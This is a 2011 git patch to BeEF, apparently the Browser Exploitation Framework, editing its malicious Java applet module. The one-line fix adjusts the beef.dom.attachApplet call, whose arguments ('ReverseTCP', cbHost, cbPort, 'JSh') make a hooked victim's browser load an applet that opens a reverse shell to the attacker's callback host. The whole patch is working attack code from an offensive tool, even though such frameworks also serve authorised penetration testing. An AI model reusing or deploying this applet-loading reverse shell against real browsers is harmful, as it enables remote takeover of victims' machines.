From 894e03da9ce112d75f0ea612f8947a57ef4f32fb Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Mon, 7 Nov 2011 18:36:19 +0000 Subject: [PATCH] Fixes issue 555: fixed using the attachApplet JS api in the malicious Java applet module. git-svn-id: https://beef.googlecode.com/svn/trunk@1417 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- modules/exploits/java_payload/command.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/java_payload/command.js index 6a522237a..22ab60497 100755 --- a/modules/exploits/java_payload/command.js +++ b/modules/exploits/java_payload/command.js @@ -23,7 +23,7 @@ beef.execute(function() { var applet_name = '<%= @applet_name %>'; beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader', - applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]); + null, applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]); //TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).